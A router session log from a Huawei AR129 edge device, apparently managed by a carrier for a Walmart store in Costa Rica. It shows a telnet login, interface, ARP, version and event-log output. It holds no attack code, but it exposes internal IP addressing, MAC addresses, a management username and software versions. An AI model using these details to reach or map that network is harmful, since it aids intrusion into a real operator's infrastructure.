    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 5/7/228 MS
CONFIG DEL CPE:
&lt;HHERCRMPN1W1N01O01EIM1&gt;TEL VPN DATOS_WALMART 10.201.12.138
TRYING 10.201.12.138 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.201.12.138 ...
LOGIN AUTHENTICATION
USERNAME:CLAROCR
PASSWORD:
  -----------------------------------------------------------------------------
  USER LAST LOGIN INFORMATION:
  -----------------------------------------------------------------------------
  ACCESS TYPE: TELNET
  IP-ADDRESS : 10.201.12.129
  TIME       : 2022-06-20 18:19:25-06:00
  -----------------------------------------------------------------------------
&lt;CC_WALMART_CR_TIENDA_3128&gt;SCREEN-LENGTH 0 TEMPORARY
INFO: THE CONFIGURATION TAKES EFFECT ON THE CURRENT USER TERMINAL INTERFACE ONLY.
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP IP INT BRIEF
*DOWN: ADMINISTRATIVELY DOWN
^DOWN: STANDBY
(L): LOOPBACK
(S): SPOOFING
(E): E-TRUNK DOWN
THE NUMBER OF INTERFACE THAT IS UP IN PHYSICAL IS 6
THE NUMBER OF INTERFACE THAT IS DOWN IN PHYSICAL IS 6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15         10.201.12.138/27     UP         UP
GIGABITETHERNET0/0/0.2115         10.201.42.106/27     UP         UP
GIGABITETHERNET0/0/1              22.32.4.121/30       UP         UP
GIGABITETHERNET0/0/4              UNASSIGNED           *DOWN      DOWN
GIGABITETHERNET0/0/5              UNASSIGNED           *DOWN      DOWN
LOOPBACK5                         10.99.77.67/32       UP         UP(S)
NULL0                             UNASSIGNED           UP         UP(S)
VLANIF1                           UNASSIGNED           DOWN       DOWN
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP DEVICE SLOT 0
AR129CGVW-L'S DEVICE STATUS:
SLOT  SUB TYPE             ONLINE   POWER     REGISTER      ALARM        PRIMARY
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
0     -   AR129CGVW-L      PRESENT  POWERON   REGISTERED    NORMAL       MASTER
-------------------------------------------------------------------------------
  BOARD NAME        : AR129CGVW-L
  BOARD DESCRIPTION : AR129CGVW-L
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
  PORT  PORT         OPTIC    MDI   SPEED  DUPLEX  FLOW-    PORT     POE
        TYPE         STATUS         (MBPS)         CTRL     STATE    STATE
-------------------------------------------------------------------------------
  0     GE(C)        -        AUTO  1000   FULL    DISABLE  UP       -
  1     GE(C)        -        AUTO  100    FULL    DISABLE  UP       -
  2     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  3     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  4     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  5     GE(C)        -        AUTO  1000   FULL    DISABLE  DOWN     -
  6     VDSL(-)      -        -     5.696  -       -        DOWN     -
  7     CELLULAR(-)  -        -     10     -       -        -        -
  8     CELLULAR(-)  -        -     10     -       -        -        -
  9     WLAN(-)      -        -     54     -       -        UP       -
  10    WLAN(-)      -        -     54     -       -        UP       -
-------------------------------------------------------------------------------
&lt;CC_WALMART_CR_TIENDA_3128&gt; DISP INT DES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DOWN     ENLACE DATOS
GE0/0/0.1115                  UP      UP       WAN PRINCIPAL/_/CONTR0001514812OC                                               /_/
GE0/0/0.2115                  UP      UP       REDUNDANCY LINK TO MTR488
GE0/0/1                       UP      UP       LAN DEL CLIENTE
GE0/0/2                       *DOWN   DOWN     LIBRE
GE0/0/3                       *DOWN   DOWN     LIBRE
GE0/0/4                       *DOWN   DOWN     LIBRE
GE0/0/5                       *DOWN   DOWN     VIRTUALPORT
LOOP5                         UP      UP(S)    MONITOREO DEL CNOC
NULL0                         UP      UP(S)    HUAWEI, AR SERIES, NULL0 INTERFAC                                               E
VLANIF1                       DOWN    DOWN     LAN DEL CLIENTE
WLAN0/0/0                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               0 INTERFACE
WLAN0/0/1                     UP      UP       HUAWEI, AR SERIES, WLAN-RADIO0/0/                                               1 INTERFACE
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP ARP ALL
IP ADDRESS      MAC ADDRESS     EXPIRE(M) TYPE        INTERFACE   VPN-INSTANCE
                                          VLAN/CEVLAN PVC
------------------------------------------------------------------------------
22.32.4.121     60DE-F329-2FF1            I -         GE0/0/1
22.32.4.122     INCOMPLETE      1         D-0         GE0/0/1
10.201.12.138   60DE-F329-2FF1            I -         GE0/0/0.1115
10.201.12.129   505D-AC64-7F7C  19        D-0         GE0/0/0.1115
                                          1115/-
10.201.42.106   60DE-F329-2FF1            I -         GE0/0/0.2115
10.201.42.97    F4DE-AF06-70A8  20        D-0         GE0/0/0.2115
                                          2115/-
------------------------------------------------------------------------------
TOTAL:6         DYNAMIC:3       STATIC:0     INTERFACE:3
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP MAC-AD
-------------------------------------------------------------------------------
MAC ADDRESS       VLAN/BRIDGE/VSI         LEARNED-FROM               TYPE
-------------------------------------------------------------------------------
-------------------------------------------------------------------------------
TOTAL ITEMS DISPLAYED = 0
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP VER
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.160 (AR160 V200R008C20SPC800)
COPYRIGHT (C) 2011-2016 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 8 WEEKS, 1 DAY, 8 HOURS, 21 MINUTES
MPU 0(MASTER) : UPTIME IS 8 WEEKS, 1 DAY, 8 HOURS, 21 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_WALMART_CR_TIENDA_3128&gt;DISP LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 84
JUN 20 2022 18:21:09-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[0]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
JUN 20 2022 18:21:09-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[1]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
JUN 20 2022 18:21:04-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[2]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE DOWN STATE.
JUN 20 2022 18:21:04-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[3]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO DOWN STATE.
JUN 20 2022 13:57:08-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/3/NBR_DOWN_REASON(L)[4]:NEIGHBOR STATE LEAVES FULL OR CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORROUTERID=22.36.15.67, NEIGHBORAREAID=0, NEIGHBORINTERFACE=GIGABITETHERNET0/0/1,NEIGHBORDOWNIMMEDIATE REASON=NEIGHBOR DOWN DUE TO INACTIVITY, NEIGHBORDOWNPRIMEREASON=HELLO NOT SEEN, NEIGHBORCHANGETIME=2022-06-20 13:57:08-06:00)
JUN 20 2022 13:57:08-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/3/NBR_CHG_DOWN(L)[5]:NEIGHBOR EVENT:NEIGHBOR STATE CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=INACTIVITYTIMER, NEIGHBORPREVIOUSSTATE=FULL, NEIGHBORCURRENTSTATE=DOWN)
JUN 20 2022 13:45:50-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[6]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
JUN 20 2022 13:45:50-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[7]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
JUN 20 2022 13:45:50-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[8]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
JUN 20 2022 13:45:50-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[9]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
JUN 20 2022 13:45:42-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[10]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
JUN 20 2022 13:45:10-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[11]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
JUN 20 2022 13:45:10-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[12]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
JUN 20 2022 13:43:01-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[13]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE DOWN STATE.
JUN 20 2022 13:43:01-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[14]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO DOWN STATE.
JUN 20 2022 13:39:43-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/3/NBR_DOWN_REASON(L)[15]:NEIGHBOR STATE LEAVES FULL OR CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORROUTERID=22.36.15.67, NEIGHBORAREAID=0, NEIGHBORINTERFACE=GIGABITETHERNET0/0/1,NEIGHBORDOWNIMMEDIATE REASON=NEIGHBOR DOWN DUE TO INACTIVITY, NEIGHBORDOWNPRIMEREASON=HELLO NOT SEEN, NEIGHBORCHANGETIME=2022-06-20 13:39:43-06:00)
JUN 20 2022 13:39:43-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/3/NBR_CHG_DOWN(L)[16]:NEIGHBOR EVENT:NEIGHBOR STATE CHANGED TO DOWN. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=INACTIVITYTIMER, NEIGHBORPREVIOUSSTATE=FULL, NEIGHBORCURRENTSTATE=DOWN)
JUN 20 2022 13:33:58-06:00 CC_WALMART_CR_TIENDA_3128 %%01NTP/4/PEER_SELE(L)[17]:THE PEER SELECTED BY THE SYSTEM IS 10.201.12.129.
JUN 20 2022 13:31:47-06:00 CC_WALMART_CR_TIENDA_3128 %%01NTP/4/PEER_SELE(L)[18]:THE PEER SELECTED BY THE SYSTEM IS 10.201.42.97.
JUN 16 2022 13:36:06-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[19]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 16 2022 13:35:26-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[20]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 16 2022 13:34:46-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[21]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 16 2022 13:01:05-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[22]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 16 2022 13:00:25-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[23]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 16 2022 12:59:45-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[24]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 15 2022 06:18:42-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[25]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 15 2022 06:18:02-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[26]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 15 2022 02:06:33-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[27]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 15 2022 02:05:53-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[28]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN 15 2022 02:05:13-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[29]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN  1 2022 02:04:19-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[30]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
JUN  1 2022 02:03:39-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[31]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 12:05:24-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[32]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 12:04:44-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[33]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 12:04:03-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[34]:LAST MESSAGE REPEATED 6 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 11:45:21-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[35]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 11:44:41-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[36]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 19 2022 11:44:01-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[37]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:36:55-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[38]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:36:15-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[39]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:35:35-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[40]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:20:03-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[41]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 06:19:23-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[42]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 02:05:56-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[43]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY 15 2022 02:05:16-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[44]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 06:55:30-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[45]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 06:54:50-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[46]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 06:54:10-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[47]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 06:20:05-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[48]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 06:19:25-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[49]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 02:05:41-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[50]:LAST MESSAGE REPEATED 4 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
MAY  1 2022 02:05:01-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[51]:LAST MESSAGE REPEATED 3 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:48:24-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[52]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:47:44-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[53]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:47:04-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[54]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:18:48-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[55]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:18:08-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[56]:LAST MESSAGE REPEATED 8 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 29 2022 06:17:28-06:00 CC_WALMART_CR_TIENDA_3128 %%01INFO/4/SUPPRESS_LOG(L)[57]:LAST MESSAGE REPEATED 7 TIMES.(INFOID=3229683715, MODULENAME=SNMP, INFOALIAS=SNMP_LOG_IP_UNLOCK)
APR 24 2022 10:05:28-06:00 CC_WALMART_CR_TIENDA_3128 %%01BGP/3/STATE_CHG_UPDOWN(L)[58]:THE STATUS OF THE PEER 10.201.12.129 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
APR 24 2022 10:05:28-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[59]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
APR 24 2022 10:05:27-06:00 CC_WALMART_CR_TIENDA_3128 %%01BGP/3/STATE_CHG_UPDOWN(L)[60]:THE STATUS OF THE PEER 10.201.42.97 CHANGED FROM OPENCONFIRM TO ESTABLISHED. (INSTANCENAME=PUBLIC, STATECHANGEREASON=UP)
APR 24 2022 10:05:27-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[61]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
APR 24 2022 10:05:27-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[62]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
APR 24 2022 10:05:27-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[63]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
APR 24 2022 10:05:24-06:00 CC_WALMART_CR_TIENDA_3128 %%01OSPF/4/NBR_CHANGE_E(L)[64]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=65410, NEIGHBORADDRESS=22.32.4.122, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
APR 24 2022 10:05:19-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/DRVICOUTSTR(L)[65]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
APR 24 2022 10:05:19-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/DRVICOUTSTR(L)[66]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
APR 24 2022 10:04:58-06:00 CC_WALMART_CR_TIENDA_3128 %%01NTP/4/PEER_SELE(L)[67]:THE PEER SELECTED BY THE SYSTEM IS 10.201.12.129.
APR 24 2022 10:04:58-06:00 CC_WALMART_CR_TIENDA_3128 %%01NTP/4/STRATUM_CHANGE(L)[68]:SYSTEM STRATUM CHANGES FROM 16 TO 4 AFTER CLOCK UPDATE.
APR 24 2022 10:04:58-06:00 CC_WALMART_CR_TIENDA_3128 %%01NTP/4/LEAP_CHANGE(L)[69]:SYSTEM LEAP CHANGES FROM 3 TO 0 AFTER CLOCK UPDATE.
APR 23 2022 23:14:02-06:00 CC_WALMART_CR_TIENDA_3128 %%01NTP/4/PEER_SELE(L)[70]:THE PEER SELECTED BY THE SYSTEM IS 10.201.12.129.
APR 23 2022 23:14:01-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[71]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/1 HAS ENTERED THE UP STATE.
APR 23 2022 23:14:01-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[72]:INTERFACE GIGABITETHERNET0/0/1 HAS TURNED INTO UP STATE.
APR 23 2022 23:14:00-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[73]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.2115 HAS ENTERED THE UP STATE.
APR 23 2022 23:13:59-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[74]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/0.1115 HAS ENTERED THE UP STATE.
APR 23 2022 23:13:59-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[75]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
APR 23 2022 23:13:58-06:00 CC_WALMART_CR_TIENDA_3128 %%01SSLA/3/PKI_GET_CERT_FAIL(L)[76]:PKI FAILS TO OBTAIN CERTIFICATES.(POLICYNAME=DEFAULT_POLICY,POLICYTYPE=1)
APR 23 2022 23:13:58-06:00 CC_WALMART_CR_TIENDA_3128 %%01DEV/4/ENTUP(L)[77]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
APR 23 2022 23:13:56-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[78]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
APR 23 2022 23:13:55-06:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/IF_STATE(L)[79]:INTERFACE WLAN-RADIO0/0/0 HAS TURNED INTO UP STATE.
APR 23 2022 23:13:48-06:00 CC_WALMART_CR_TIENDA_3128 %%01RM/4/ROUTERID_CHANGE(L)[80]:THE ROUTER ID IS 10.201.12.138. (INSTANCEID=0)
APR 23 2022 23:13:46+00:00 CC_WALMART_CR_TIENDA_3128 %%01IFNET/4/LINK_STATE(L)[81]:THE LINE PROTOCOL IP ON THE INTERFACE LOOPBACK5 HAS ENTERED THE UP STATE.
APR 23 2022 23:13:40+00:00 CC_WALMART_CR_TIENDA_3128 %%01IFPDT/4/DRVICOUTSTR(L)[82]:3G/LTE MODULE ON CELLULAR0/0/0 IS INSERTED!
